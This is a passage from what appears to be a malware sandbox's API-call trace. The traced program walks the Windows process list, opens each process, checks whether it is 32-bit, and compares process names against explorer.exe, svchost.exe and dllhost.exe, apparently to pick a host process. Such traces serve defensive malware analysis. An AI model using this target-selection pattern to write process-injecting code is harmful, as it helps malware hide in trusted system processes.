1 [0222.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0222.691] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0222.691] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0222.692] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0222.692] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0222.693] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0222.693] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0222.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0222.694] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0222.694] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0222.695] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0222.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0222.695] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.695] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.695] CloseHandle (hObject=0xec) returned 1 [0222.695] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0222.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0222.696] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0222.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0222.696] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.696] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.696] CloseHandle (hObject=0xec) returned 1 [0222.697] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0222.697] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0222.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0222.698] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0222.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0222.698] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.698] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.698] CloseHandle (hObject=0xec) returned 1 [0222.698] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0222.698] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0222.698] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0222.698] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0222.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0222.699] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.699] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.699] CloseHandle (hObject=0xec) returned 1 [0222.699] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0222.699] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0222.699] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0222.699] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0222.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0222.699] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.699] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.700] CloseHandle (hObject=0xec) returned 1 [0222.700] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0222.700] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0222.700] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0222.700] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0222.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0222.700] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.700] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.700] CloseHandle (hObject=0xec) returned 1 [0222.700] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0222.700] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0222.700] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0222.700] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0222.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0222.701] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.701] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.701] CloseHandle (hObject=0xec) returned 1 [0222.701] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0222.701] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0222.701] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0222.701] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0222.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0222.702] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.702] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.702] CloseHandle (hObject=0xec) returned 1 [0222.702] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0222.702] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0222.702] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0222.702] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0222.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0222.702] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.702] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.702] CloseHandle (hObject=0xec) returned 1 [0222.702] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0222.702] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0222.702] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0222.702] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0222.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0222.703] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.703] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.703] CloseHandle (hObject=0xec) returned 1 [0222.703] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0222.703] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0222.703] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0222.703] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0222.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0222.704] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.704] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.704] CloseHandle (hObject=0xec) returned 1 [0222.704] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0222.704] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0222.704] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0222.704] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0222.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0222.704] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.704] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.704] CloseHandle (hObject=0xec) returned 1 [0222.704] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0222.704] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0222.704] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0222.705] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0222.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0222.705] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.705] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.705] CloseHandle (hObject=0xec) returned 1 [0222.705] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0222.705] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0222.705] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0222.705] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0222.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0222.706] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.706] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.706] CloseHandle (hObject=0xec) returned 1 [0222.706] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0222.706] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0222.706] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0222.706] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0222.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0222.706] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.706] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.706] CloseHandle (hObject=0xec) returned 1 [0222.706] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0222.706] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0222.707] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0222.707] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0222.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0222.707] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.707] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.707] CloseHandle (hObject=0xec) returned 1 [0222.707] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0222.707] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0222.707] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0222.707] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0222.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0222.708] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.708] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.708] CloseHandle (hObject=0xec) returned 1 [0222.708] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0222.708] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0222.708] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0222.708] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0222.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0222.708] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.709] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.709] CloseHandle (hObject=0xec) returned 1 [0222.709] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0222.709] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0222.709] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0222.709] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0222.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0222.709] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.709] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.709] CloseHandle (hObject=0xec) returned 1 [0222.709] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0222.709] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0222.709] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0222.709] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0222.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0222.710] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.710] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.710] CloseHandle (hObject=0xec) returned 1 [0222.710] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0222.710] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0222.710] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0222.710] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0222.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0222.711] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.711] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.711] CloseHandle (hObject=0xec) returned 1 [0222.711] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0222.711] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0222.711] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0222.711] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0222.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0222.711] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.711] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.711] CloseHandle (hObject=0xec) returned 1 [0222.711] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0222.711] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0222.711] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0222.711] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0222.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0222.712] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.712] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.712] CloseHandle (hObject=0xec) returned 1 [0222.712] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0222.712] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0222.712] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0222.712] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0222.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0222.713] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0222.713] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, 